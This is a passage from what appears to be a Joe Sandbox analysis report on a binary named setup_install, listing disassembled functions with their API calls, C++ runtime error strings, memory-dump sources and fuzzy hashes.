                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort$pthread_once
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3910317518-0
                                                                                                                            • Opcode ID: dfda3d8e8dc092246aabcd2bc00dcad0c1ff3c74a00a05e1550d978620925cb4
                                                                                                                            • Instruction ID: d5a3108a487096504c9429c1e621f5935bbdaf17ed140aa38893f2545797946e
                                                                                                                            • Opcode Fuzzy Hash: dfda3d8e8dc092246aabcd2bc00dcad0c1ff3c74a00a05e1550d978620925cb4
                                                                                                                            • Instruction Fuzzy Hash: 5F211A74A0020DABCF10EFA5C4819EEF7B4EB49318F1084A9AC486B342D634EE49CA94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410EEC Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00410F02
                                                                                                                            • pthread_key_create.LIBWINPTHREAD-1 ref: 00410F16
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort$pthread_key_createpthread_mutex_init
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 582626390-0
                                                                                                                            • Opcode ID: 37ece31fae3d408e8a3c2700ceac09ae622411848df71372ae9389b8347ca603
                                                                                                                            • Instruction ID: f633d53a72474da17a03df5b074fc629c6a3a0d7fb948da823b8b813543d536d
                                                                                                                            • Opcode Fuzzy Hash: 37ece31fae3d408e8a3c2700ceac09ae622411848df71372ae9389b8347ca603
                                                                                                                            • Instruction Fuzzy Hash: DDE0ECB48497045AC7007FAA550137EB9E0AB8134DF80985EE5C417642EB7C94854AEF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040DFC0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 403stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410D50: pthread_once.LIBWINPTHREAD-1 ref: 00410D6E
                                                                                                                              • Part of subcall function 00410D50: pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00410D7A
                                                                                                                              • Part of subcall function 00410D50: pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00410DFE
                                                                                                                            • strlen.MSVCRT ref: 0040E043
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_oncestrlen
                                                                                                                            • String ID: cI
                                                                                                                            • API String ID: 3094089809-2783008204
                                                                                                                            • Opcode ID: 7f1aeb4eed6491e3735680d483baf0e6860c5d4d920119b1c1e47491291408df
                                                                                                                            • Instruction ID: b13153a8158f434decec644cd76ed5a2a225c3d90c06d97322aabd02ec9deea8
                                                                                                                            • Opcode Fuzzy Hash: 7f1aeb4eed6491e3735680d483baf0e6860c5d4d920119b1c1e47491291408df
                                                                                                                            • Instruction Fuzzy Hash: D7F126B06087519FD724CF2AC444366FFE1BB45314F088A7ED8995B3C2C379A969CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004200D0 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 315COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcslen
                                                                                                                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                                                                                                                            • API String ID: 4088430540-1697194757
                                                                                                                            • Opcode ID: ff97d2ccd1d5b4f028581c05d585948439b21547310f866b95046f06cc8d58e4
                                                                                                                            • Instruction ID: af478a233552878e378fa197dd203f78dcd560e6402f760e1fbc85cebe9ecf07
                                                                                                                            • Opcode Fuzzy Hash: ff97d2ccd1d5b4f028581c05d585948439b21547310f866b95046f06cc8d58e4
                                                                                                                            • Instruction Fuzzy Hash: 6F91EF36B042218BC314DE69E4C086BF7E2EBE9754F54892FE98887311D336DC95CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483630 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • basic_string::_M_replace_aux, xrefs: 00483740
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memmovememset
                                                                                                                            • String ID: basic_string::_M_replace_aux
                                                                                                                            • API String ID: 1288253900-2536181960
                                                                                                                            • Opcode ID: 81ee456d49c7af145c5f751372fd39bb2035d31e3eaf91af39276ee4fa4497c6
                                                                                                                            • Instruction ID: 95358264a488c1ee8d2cd70714ce8d2102e0b77b5732ac8ca7047b5b6a082ab4
                                                                                                                            • Opcode Fuzzy Hash: 81ee456d49c7af145c5f751372fd39bb2035d31e3eaf91af39276ee4fa4497c6
                                                                                                                            • Instruction Fuzzy Hash: C431AFB56082108FC710EF2CC58062FBBF1AFC6B01F18896EE8948B315E339CA45CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040FD00 Relevance: 4.6, APIs: 3, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 3a2b53fe22b4828c982969efc07e56ad4ef8f52c3d408da1e59ba03de47ee3b1
                                                                                                                            • Instruction ID: 847419551052188b0777ab6addeb73154eee9973f7ace292715edea9ab5232bf
                                                                                                                            • Opcode Fuzzy Hash: 3a2b53fe22b4828c982969efc07e56ad4ef8f52c3d408da1e59ba03de47ee3b1
                                                                                                                            • Instruction Fuzzy Hash: D5210B327042154FCB108F59E8C16A5B3E5EBC1318F18857EE9485B745C279A80B87A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004612B0 Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::basic_string
                                                                                                                            • API String ID: 0-4170083050
                                                                                                                            • Opcode ID: b34997d78a5b1889d304cc5bdeadc052f4b8b963d9bf1f1bca78e460c3300d5e
                                                                                                                            • Instruction ID: c54e02bdf6bf7dd406e97f94c5ea3f4335f1c4eeb222ea75267082964f1b5398
                                                                                                                            • Opcode Fuzzy Hash: b34997d78a5b1889d304cc5bdeadc052f4b8b963d9bf1f1bca78e460c3300d5e
                                                                                                                            • Instruction Fuzzy Hash: 40310AB5A093019FC304EF29D89095BFBE1FBD9354F54C92EE8C897311D278D8849B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042A430 Relevance: 2.5, Strings: 2, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • %s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0042A490
                                                                                                                            • basic_string::substr, xrefs: 0042A488
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
                                                                                                                            • API String ID: 0-3532027576
                                                                                                                            • Opcode ID: 1afcbc465e3cd1430d5a7d2de2225f262a0e6e1ae2a758f97eb36aab97f477f8
                                                                                                                            • Instruction ID: cf5cedd0107a52143a17f26ede057500d7948c593e6bc590f0d4c28b0328b607
                                                                                                                            • Opcode Fuzzy Hash: 1afcbc465e3cd1430d5a7d2de2225f262a0e6e1ae2a758f97eb36aab97f477f8
                                                                                                                            • Instruction Fuzzy Hash: D6017CB0A092109FCB04EF2DC18441AFBE5FBDA308F50896EE48897315D775D845CB8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00420980 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 004209A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
                                                                                                                            • API String ID: 0-3720052664
                                                                                                                            • Opcode ID: 1138073e638d2bfee186ea0a9eb964721d19ee99f8a136ecb651c7149419b0a8
                                                                                                                            • Instruction ID: 67366e8b45d7166cc701e7b9fb2a7fee1178d6a2882d561619a2ac60ae6a496e
                                                                                                                            • Opcode Fuzzy Hash: 1138073e638d2bfee186ea0a9eb964721d19ee99f8a136ecb651c7149419b0a8
                                                                                                                            • Instruction Fuzzy Hash: B3E0B6B1E056008BCB04EF18C58582AF7F1ABD6304F54D9ADE0859B321D339D850CA5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00445E80 Relevance: .2, Instructions: 175COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 71e79c71a0223e80e8ec958aecb2fec712a380092e991e337444bececd21d967
                                                                                                                            • Instruction ID: 4101cd4284b2abb5ced94146d2dd60a42c42cd6c29dbf595747f2f89cfd240d4
                                                                                                                            • Opcode Fuzzy Hash: 71e79c71a0223e80e8ec958aecb2fec712a380092e991e337444bececd21d967
                                                                                                                            • Instruction Fuzzy Hash: 53616171D003489BEF20DFB8D4806AEBBF1BF05354F05852AE8959B341E378E949CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CA90 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9fc752b5da568f33804aba3e3bc3cdb4af96f99afd21d5da2c535057c6000645
                                                                                                                            • Instruction ID: a5f873a2afdb9035182bda6935ea4dfd165abd0d7ad9b2d3a89ec7dd887063f0
                                                                                                                            • Opcode Fuzzy Hash: 9fc752b5da568f33804aba3e3bc3cdb4af96f99afd21d5da2c535057c6000645
                                                                                                                            • Instruction Fuzzy Hash: E2C08CB4C067408BCA00BF39820A22CFEB06F42308FC82DBCE48013206E639C01C875F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CB04 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 55426265c259a533035c9b04f59a64a440aefd46c28bd4d552d78dde1ad026f0
                                                                                                                            • Instruction ID: 81b84116a0f822e2236df48ac5f67ec03497f7ff3ab4545150e5221d73b3c6d8
                                                                                                                            • Opcode Fuzzy Hash: 55426265c259a533035c9b04f59a64a440aefd46c28bd4d552d78dde1ad026f0
                                                                                                                            • Instruction Fuzzy Hash: 70C08CE2C05B008BE6007E248007228BBB05B52224FC8689C844517303E17EC1149A4E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CC52 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0958556880e0d4c8fde4ffdd35ac77637917b1f0739412043cce05662e3b67c7
                                                                                                                            • Instruction ID: 7dc73093cecfd7818f0f8c39efba9146193b40049650851d9d0f20bd94480c41
                                                                                                                            • Opcode Fuzzy Hash: 0958556880e0d4c8fde4ffdd35ac77637917b1f0739412043cce05662e3b67c7
                                                                                                                            • Instruction Fuzzy Hash: 4BB09B55C40D0506E7143E381517178F771A653114FC935DC847127717E42EC127555E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041E4D0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 141fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • terminate called recursively, xrefs: 0041E6A7
                                                                                                                            • terminate called without an active exception, xrefs: 0041E675
                                                                                                                            • terminate called after throwing an instance of ', xrefs: 0041E5E1
                                                                                                                            • not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 0041E4E9
                                                                                                                            • -, xrefs: 0041E661
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fwrite$abortfputsfreememcpy$strlen
                                                                                                                            • String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                                                            • API String ID: 4144276882-1195946326
                                                                                                                            • Opcode ID: 043e1d8867c74cccbdd6aa5d1d5e66bd968923372564af98d47f38ae50a0e4bc
                                                                                                                            • Instruction ID: e634abd9a3fef74af5cb88305bf41d35c79fad1829e9e2ad4b5ef55a80f026dd
                                                                                                                            • Opcode Fuzzy Hash: 043e1d8867c74cccbdd6aa5d1d5e66bd968923372564af98d47f38ae50a0e4bc
                                                                                                                            • Instruction Fuzzy Hash: A0513AB08083099FDB10AF65C48579EBFE4AF95304F01896EE8D887252D7BC8485CF97
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C990 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 259memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • Unknown pseudo relocation protocol version %d., xrefs: 0040CC04
                                                                                                                            • Unknown pseudo relocation bit size %d., xrefs: 0040CB39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
